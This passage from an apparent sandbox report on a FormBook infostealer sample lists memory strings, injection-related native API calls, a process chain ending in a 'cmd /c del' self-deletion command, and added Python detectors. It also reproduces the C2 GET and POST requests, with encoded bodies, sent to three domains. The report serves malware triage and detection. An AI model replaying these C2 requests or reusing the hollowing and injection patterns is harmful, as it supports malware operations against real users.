Source: chkdsk.exe, 00000005.00000002.473825727.0000000001238000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2Gw
Source: chkdsk.exe, 00000005.00000002.475943416.000000000549C000.00000004.00000020.sdmp, chkdsk.exe, 00000005.00000002.476043438.00000000054C0000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: chkdsk.exe, 00000005.00000003.362069165.00000000054BE000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
Source: chkdsk.exe, 00000005.00000002.476016156.00000000054B6000.00000004.00000020.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033leH
Source: chkdsk.exe, 00000005.00000002.475930032.0000000005497000.00000004.00000020.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033B
Source: chkdsk.exe, 00000005.00000002.476043438.00000000054C0000.00000004.00000001.sdmp, chkdsk.exe, 00000005.00000003.362069165.00000000054BE000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: chkdsk.exe, 00000005.00000002.476043438.00000000054C0000.00000004.00000001.sdmp, chkdsk.exe, 00000005.00000003.363122009.00000000054BE000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: explorer.exe, 00000002.00000000.236799858.000000000B156000.00000002.00000001.sdmp | Strings found in binary or memory:
  • http://fontfabrik.com
  • http://www.apache.org/licenses/LICENSE-2.0
  • http://www.carterandcone.coml
  • http://www.fontbureau.com
  • http://www.fontbureau.com/designers
  • http://www.fontbureau.com/designers/?
  • http://www.fontbureau.com/designers/cabarga.htmlN
  • http://www.fontbureau.com/designers/frere-user.html
  • http://www.fontbureau.com/designers8
  • http://www.fontbureau.com/designers?
  • http://www.fontbureau.com/designersG
  • http://www.fonts.com
  • http://www.founder.com.cn/cn
  • http://www.founder.com.cn/cn/bThe
  • http://www.founder.com.cn/cn/cThe
  • http://www.galapagosdesign.com/DPlease
  • http://www.galapagosdesign.com/staff/dennis.htm
  • http://www.goodfont.co.kr
  • http://www.jiyu-kobo.co.jp/
  • http://www.sajatypeworks.com
  • http://www.sakkal.com
  • http://www.sandoll.co.kr
  • http://www.tiro.com
  • http://www.typography.netD
  • http://www.urwpp.deDPlease
  • http://www.zhongyicts.com.cn
Source: vSCyL8NNIC.exe, 00000000.00000002.221143021.000000000110A000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
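The requests above share one path (/5gb/) across three domains. Every GET carries a four-character parameter (0B=LZxP) and a long opaque parameter (jJEXPjV=...), sends Connection: close and no User-Agent; the POSTs go to the same path on the same domains with an IE11 User-Agent and a form-encoded body whose only field is again jJEXPjV, and the Snort alert shows the first host answering 403 rather than acting as a live C2 during the run. The following added example, not part of the Joe Sandbox report, parses requests constructed from those lines and scores that per-path pattern; the indicator names, the blob alphabet, the length thresholds and the benign control request are assumptions of the example, and the two POST bodies are the 413-byte ones shown above:

```python
"""Profile the HTTP requests from the Networking section for a beacon pattern.

Added example, not part of the Joe Sandbox report. RAW_REQUESTS is
constructed from the GET and POST lines above plus one benign control
request; indicator names, BLOB_RE and the threshold are assumptions.
"""
import re
from collections import defaultdict
from typing import Dict, List
from urllib.parse import urlsplit

# Opaque value: a long run over a base64-like alphabet extended with the
# characters that occur in the captured bodies: ( ) _ - ~ .
BLOB_RE = re.compile(r"^[A-Za-z0-9+/=_~().\-]{32,}$")
IE11_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko"


def _post(host: str, body: str) -> str:
    """Rebuild one captured POST (headers in the order the report shows them)."""
    return (f"POST /5gb/ HTTP/1.1\r\nHost: {host}\r\nConnection: close\r\n"
            f"Content-Length: {len(body)}\r\nCache-Control: no-cache\r\n"
            f"Origin: http://{host}\r\nUser-Agent: {IE11_UA}\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\nAccept: */*\r\n"
            f"Referer: http://{host}/5gb/\r\nAccept-Language: en-US\r\n"
            "Accept-Encoding: gzip, deflate\r\n\r\n" + body)


RAW_REQUESTS = [
    "GET /5gb/?0B=LZxP&jJEXPjV=wkiRR1Aw+Nr4Qs3rRkg1xbSjrbPlsIXn1FpdqrR7N9kZqsYnB2egJP22LrAYllq2dgSl HTTP/1.1\r\n"
    "Host: www.nationbuolder.com\r\nConnection: close\r\n\r\n",
    "GET /5gb/?jJEXPjV=VSxJHqYOiiT/QfeO16tpc+XSptzmGTZDDQA2CuabIISuT1EE8M4dKQacUbfINdmsiM57&0B=LZxP HTTP/1.1\r\n"
    "Host: www.finanzasadilia.com\r\nConnection: close\r\n\r\n",
    "GET /5gb/?0B=LZxP&jJEXPjV=okNRSiupe8c8QAdYgh0f+o4aR61IgfaHtn4dWuciZgJWAwn99zimG+/MTmPPo01PSLkg HTTP/1.1\r\n"
    "Host: www.thestupidquestion.com\r\nConnection: close\r\n\r\n",
    _post("www.finanzasadilia.com",
          "jJEXPjV=dw9zZNQg(SjuE_z5i_IlNLzLgIHpBnlCfEBzbJTCGLC4VnIa18F7IXvcM-foaeuDgLI2E0HZeKaWNZ8pR8(OxfEVWMMqTAVqeaFNLp0hYv3EwDDvu3sU9bvEWwj_N4JLGnjVVew1sJnWxxL9pEV3jfEN(9OO7k64ldjCLIVcSyPG4BNYtiymARXYgy0yqtQR99uF59bVqbdvjMqc(ittsUu51tG6XYmR3ft3KnN_KwoXI0(YqvDxCDSOtN8kEkEGTNiHSiHlzeDWHv7JtC(ncltxYOPi(ep4X6HMmsL1QP1Ih-ewL2lTLAI6ZaMw2uunOlDXVAmxZ10zH6fW2gEj6C~3m0KNacgD6rmzUFofzHHLMwFzDrJt~Ty9CtAD81BfknSt359wAv3Bn8KK(w)."),
    _post("www.thestupidquestion.com",
          "jJEXPjV=gGBrMCe7fdM-JHUQ6B1kuNceYKtUl-2Q73dvNOY_XEoTBi~kvQi_ILyMJk(GqFxCc4NWAIcpPPLkZ43Rs5Yt~w1cYsEoCWx2xE~D37MZi61Fj4Qt5jEG5AhJDNJ0GlrcYaXg1R1XaBfI7vn4sgIOwHRILIxo7WmNjksPgzcP7inBrBXbNpp2tu1kdxZ80IJQPDioQCdrfo8lpol36iMyTBYTOQ2eQJKpkn3fDaxuI_A4(6(5yqJR3IGRdHvRV1t7UaB97wx0L-Vv9u11fyPuaeIpsMSslqcKAiDVjXkIKTx6NYQrJl8eX8ID06oZCmNea_RL53A3w5m_bpUaGyWSgW6F(ff1GXvYzkYg4mTN1-~IcHejDL6hI7RbeCFrJho_TjTBxQ6jQUSDKjC1KQ)."),
    # Constructed benign control: ordinary page fetch that must not score.
    "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\nUser-Agent: curl/7.68.0\r\n\r\n",
]


def _split_form(data: str) -> Dict[str, str]:
    """k=v&k=v splitting without '+' -> space decoding (the blobs contain '+')."""
    out: Dict[str, str] = {}
    for pair in data.split("&"):
        if "=" in pair:
            key, value = pair.split("=", 1)
            out[key] = value
    return out


def parse_request(raw: str) -> dict:
    """Minimal HTTP/1.1 request parser: method, path, host, headers, parameters."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers: Dict[str, str] = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    url = urlsplit(target)
    params = _split_form(url.query) if method == "GET" else _split_form(body)
    return {"method": method, "path": url.path, "host": headers.get("host", ""),
            "headers": headers, "params": params}


def profile_paths(requests: List[dict]) -> Dict[str, dict]:
    """Aggregate per URI path the features the beacon indicators look at."""
    prof: Dict[str, dict] = defaultdict(lambda: {
        "hosts": set(), "methods": [], "blob_params": set(),
        "short_params": set(), "user_agents": set(), "keepalive": 0})
    for r in requests:
        p = prof[r["path"]]
        p["hosts"].add(r["host"])
        p["methods"].append(r["method"])
        p["user_agents"].add(r["headers"].get("user-agent", ""))
        if r["headers"].get("connection", "").lower() != "close":
            p["keepalive"] += 1
        for key, value in r["params"].items():
            if BLOB_RE.match(value):
                p["blob_params"].add(key)
            elif len(value) <= 8:
                p["short_params"].add(key)
    return dict(prof)


def beacon_indicators(p: dict) -> List[str]:
    """Human-readable indicators that fired for one path profile."""
    hits = []
    if len(p["hosts"]) >= 2:
        hits.append("same path requested on several hosts")
    if "GET" in p["methods"] and "POST" in p["methods"]:
        hits.append("GET then POST to the same path")
    if p["blob_params"]:
        hits.append("opaque blob parameter: " + ",".join(sorted(p["blob_params"])))
    if p["keepalive"] == 0:
        hits.append("every request sent with Connection: close")
    if "" in p["user_agents"] and len(p["user_agents"]) > 1:
        hits.append("User-Agent missing on some requests and present on others")
    return hits


def suspicious_paths(requests: List[dict], min_indicators: int = 4) -> List[str]:
    """Paths on which at least min_indicators beacon indicators fired."""
    return sorted(path for path, p in profile_paths(requests).items()
                  if len(beacon_indicators(p)) >= min_indicators)


if __name__ == "__main__":
    parsed = [parse_request(raw) for raw in RAW_REQUESTS]
    for path, p in profile_paths(parsed).items():
        print(path, sorted(p["hosts"]), beacon_indicators(p))
    print("suspicious:", suspicious_paths(parsed))
```

The parser deliberately avoids urllib's form decoding, which would turn the "+" inside the query blobs into spaces and hide them from the blob check; the indicators are scored per path rather than per host because the sample rotates through domains while keeping the URI and parameter names fixed, so a per-host view would see only one or two requests each.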

System Summary:

Detected FormBook malware
Source: C:\Windows\SysWOW64\chkdsk.exe | Dropped file: C:\Users\user\AppData\Roaming\0LA072R5\0LAlogri.ini
Source: C:\Windows\SysWOW64\chkdsk.exe | Dropped file: C:\Users\user\AppData\Roaming\0LA072R5\0LAlogrv.ini
Contains functionality to call native functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code functions (call site, native API called):
  • 1_2_00419CA0 NtCreateFile
  • 1_2_00419D50 NtReadFile
  • 1_2_00419DD0 NtClose
  • 1_2_00419E80 NtAllocateVirtualMemory
  • 1_2_00419CF2 NtCreateFile
  • 1_2_00419D4A NtReadFile
  • 1_2_00419DCA NtClose
  • 1_2_00419E7B NtAllocateVirtualMemory
  • 1_2_00F398F0 NtReadVirtualMemory, LdrInitializeThunk
  • 1_2_00F39860 NtQuerySystemInformation, LdrInitializeThunk
  • 1_2_00F39840 NtDelayExecution, LdrInitializeThunk
  • 1_2_00F399A0 NtCreateSection, LdrInitializeThunk
  • 1_2_00F39910 NtAdjustPrivilegesToken, LdrInitializeThunk
  • 1_2_00F39A50 NtCreateFile, LdrInitializeThunk
  • 1_2_00F39A20 NtResumeThread, LdrInitializeThunk
  • 1_2_00F39A00 NtProtectVirtualMemory, LdrInitializeThunk
  • 1_2_00F395D0 NtClose, LdrInitializeThunk
  • 1_2_00F39540 NtReadFile, LdrInitializeThunk
  • 1_2_00F396E0 NtFreeVirtualMemory, LdrInitializeThunk
  • 1_2_00F39660 NtAllocateVirtualMemory, LdrInitializeThunk
  • 1_2_00F397A0 NtUnmapViewOfSection, LdrInitializeThunk
  • 1_2_00F39780 NtMapViewOfSection, LdrInitializeThunk
  • 1_2_00F39710 NtQueryInformationToken, LdrInitializeThunk
  • 1_2_00F398A0 NtWriteVirtualMemory
  • 1_2_00F3B040 NtSuspendThread
  • 1_2_00F39820 NtEnumerateKey
  • 1_2_00F399D0 NtCreateProcessEx
  • 1_2_00F39950 NtQueueApcThread
  • 1_2_00F39A80 NtOpenDirectoryObject
  • 1_2_00F39A10 NtQuerySection
  • 1_2_00F3A3B0 NtGetContextThread
  • 1_2_00F39B00 NtSetValueKey
  • 1_2_00F395F0 NtQueryInformationFile
  • 1_2_00F39560 NtWriteFile
  • 1_2_00F3AD30 NtSetContextThread
  • 1_2_00F39520 NtWaitForSingleObject
  • 1_2_00F396D0 NtCreateKey
  • 1_2_00F39670 NtQueryInformationProcess
  • 1_2_00F39650 NtQueryValueKey
  • 1_2_00F39610 NtEnumerateValueKey
  • 1_2_00F39FE0 NtCreateMutant
  • 1_2_00F39770 NtSetInformationFile
  • 1_2_00F3A770 NtOpenThread
  • 1_2_00F39760 NtOpenProcess
  • 1_2_00F39730 NtQueryVirtualMemory
  • 1_2_00F3A710 NtOpenProcessToken
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_05A399A0 NtCreateSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_05A395D0 NtClose,LdrInitializeThunk
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_05A39910 NtAdjustPrivilegesToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_05A39560 NtWriteFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_05A39540 NtReadFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_05A39860 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_05A39840 NtDelayExecution,LdrInitializeThunk
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_05A39780 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_05A39FE0 NtCreateMutant,LdrInitializeThunk
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_05A39B00 NtSetValueKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_05A39710 NtQueryInformationToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_05A39770 NtSetInformationFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_05A396E0 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_05A396D0 NtCreateKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_05A39610 NtEnumerateValueKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_05A39660 NtAllocateVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_05A39A50 NtCreateFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_05A39650 NtQueryValueKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_05A395F0 NtQueryInformationFile
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_05A399D0 NtCreateProcessEx
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_05A39520 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_05A3AD30 NtSetContextThread
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_05A39950 NtQueueApcThread
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_05A398A0 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_05A398F0 NtReadVirtualMemory
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_05A39820 NtEnumerateKey
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_05A3B040 NtSuspendThread
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_05A397A0 NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_05A3A3B0 NtGetContextThread
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_05A39730 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_05A3A710 NtOpenProcessToken
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_05A39760 NtOpenProcess
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_05A3A770 NtOpenThread
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_05A39A80 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_05A39A20 NtResumeThread
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_05A39A00 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_05A39A10 NtQuerySection
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_05A39670 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_01269D50 NtReadFile
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_01269DD0 NtClose
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_01269CA0 NtCreateFile
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_01269E80 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_01269D4A NtReadFile
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_01269DCA NtClose
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_01269CF2 NtCreateFile
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_01269E7B NtAllocateVirtualMemory
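The native-API rows above are evidence, not an explanation; what makes them useful during triage is which calls are resolved together inside one process. The Python below is an added example, not part of this sandbox report or of the FormBook sample: it parses rows in the "Source | Code function" form used on this page, collects the Nt* names per process and reports which well-known injection call sets are complete. The technique-to-call-set mapping is this example's own assumption (chosen to mirror the signature names in the report), and the evidence rows embedded in it are copied from the list above. A process that resolves only part of a set, such as RegSvcs.exe with NtGetContextThread/NtSetContextThread here, is intentionally not flagged.

```python
import re
from collections import defaultdict

# Evidence rows copied from the report above (a subset is enough for the demo).
EVIDENCE = r"""
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_00F3A3B0 NtGetContextThread
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_00F3AD30 NtSetContextThread
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_05A399A0 NtCreateSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_05A39780 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_05A399D0 NtCreateProcessEx
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_05A397A0 NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_05A398A0 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_05A3AD30 NtSetContextThread
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_05A39A20 NtResumeThread
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_05A39950 NtQueueApcThread
"""

# Technique -> Nt* calls that must all be resolved. This grouping is the
# example's assumption, not something the sandbox states.
TECHNIQUES = {
    "process hollowing": {"NtUnmapViewOfSection", "NtWriteVirtualMemory",
                          "NtSetContextThread", "NtResumeThread"},
    "APC injection": {"NtQueueApcThread", "NtWriteVirtualMemory"},
    "section mapping": {"NtCreateSection", "NtMapViewOfSection"},
}

ROW = re.compile(r"^Source: (?P<path>\S+) \| Code function: "
                 r"(?P<addr>\d+_\d+_[0-9A-Fa-f]+) (?P<apis>[A-Za-z0-9_,]+)$")


def resolved_apis(report_text):
    """Return {process basename: set of Nt* names} from 'Code function' rows.
    Names that are not Nt* (e.g. LdrInitializeThunk) are ignored."""
    by_proc = defaultdict(set)
    for line in report_text.splitlines():
        m = ROW.match(line.strip())
        if not m:
            continue
        proc = m.group("path").rsplit("\\", 1)[-1].lower()
        for name in m.group("apis").split(","):
            if name.startswith("Nt"):
                by_proc[proc].add(name)
    return dict(by_proc)


def match_techniques(by_proc):
    """Return {process: sorted techniques whose full call set is resolved}.
    Partial sets deliberately do not match."""
    return {proc: sorted(t for t, need in TECHNIQUES.items() if need <= apis)
            for proc, apis in by_proc.items()}


if __name__ == "__main__":
    for proc, hits in match_techniques(resolved_apis(EVIDENCE)).items():
        print(f"{proc}: {', '.join(hits) or 'no complete injection call set'}")
```

Run against a full report export, the same parser gives a per-process view of the hollowing and APC primitives without reading several hundred rows by hand; extend TECHNIQUES with whatever call sets your own detections key on.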
Source: C:\Users\user\Desktop\vSCyL8NNIC.exe | Code function: 0_2_05FD5F20
Source: C:\Users\user\Desktop\vSCyL8NNIC.exe | Code function: 0_2_05FD5560
Source: C:\Users\user\Desktop\vSCyL8NNIC.exe | Code function: 0_2_05FD5552
Source: C:\Users\user\Desktop\vSCyL8NNIC.exe | Code function: 0_2_05FD2CEB
Source: C:\Users\user\Desktop\vSCyL8NNIC.exe | Code function: 0_2_05FD0040
Source: C:\Users\user\Desktop\vSCyL8NNIC.exe | Code function: 0_2_05FD0006
Source: C:\Users\user\Desktop\vSCyL8NNIC.exe | Code function: 0_2_05FD5F11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_00401030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0041D220
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_00402D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0041E61A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_00409E20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0041D695
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0041CF07
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_00402FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_00F220A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_00FC20A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_00F0B090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_00FB1002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_00F14120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_00EFF900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_00FC22AE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_00FBDBD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_00F2EBB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_00FC2B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_00F0841F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_00F0D5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_00F22581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_00FC1D55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_00EF0D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_00FC2D07
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_00FC2EF7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_00F16E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_00FC1FF1
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_05A22581
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_05A0D5E0
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_05A14120
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_059FF900
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_059F0D20
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_05AC1D55
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_05A0B090
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_05AB1002
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_05A0841F
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_05A2EBB0
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_05A16E30
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_0126D220
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_01252D90
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_0126CF07
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_01252FB0
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_01259E20
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_0126E61A
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_0126D695
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: String function: 059FB150 appears 32 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 00EFB150 appears 35 times
Source: vSCyL8NNIC.exe, 00000000.00000002.221862342.0000000002E34000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameEminem.dll< vs vSCyL8NNIC.exe
Source: vSCyL8NNIC.exe, 00000000.00000002.221143021.000000000110A000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs vSCyL8NNIC.exe
Source: vSCyL8NNIC.exe, 00000000.00000002.220635050.0000000000A00000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameM7v3.exeF vs vSCyL8NNIC.exe
Source: vSCyL8NNIC.exe | Binary or memory string: OriginalFilenameM7v3.exeF vs vSCyL8NNIC.exe
Source: vSCyL8NNIC.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: vSCyL8NNIC.exe, SecurityZone.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 0.0.vSCyL8NNIC.exe.990000.0.unpack, SecurityZone.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 0.2.vSCyL8NNIC.exe.990000.0.unpack, SecurityZone.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: classification engine | Classification label: mal100.spyw.evad.winEXE@8/4@4/3
Source: C:\Users\user\Desktop\vSCyL8NNIC.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\vSCyL8NNIC.exe.log
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6780:120:WilError_01
Source: C:\Users\user\Desktop\vSCyL8NNIC.exe | Mutant created: \Sessions\1\BaseNamedObjects\APQcTUzEjTQLpnuTDhnfLG
Source: vSCyL8NNIC.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\vSCyL8NNIC.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\explorer.exe | File read: C:\Users\user\AppData\Roaming\0LA072R5\0LAlogri.ini
Source: C:\Users\user\Desktop\vSCyL8NNIC.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts (2 occurrences)
Source: vSCyL8NNIC.exe | Virustotal: Detection: 23%
Source: vSCyL8NNIC.exe | ReversingLabs: Detection: 22%
Source: unknown | Process created: C:\Users\user\Desktop\vSCyL8NNIC.exe 'C:\Users\user\Desktop\vSCyL8NNIC.exe'
Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: unknown | Process created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
Source: unknown | Process created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\vSCyL8NNIC.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: C:\Windows\SysWOW64\chkdsk.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
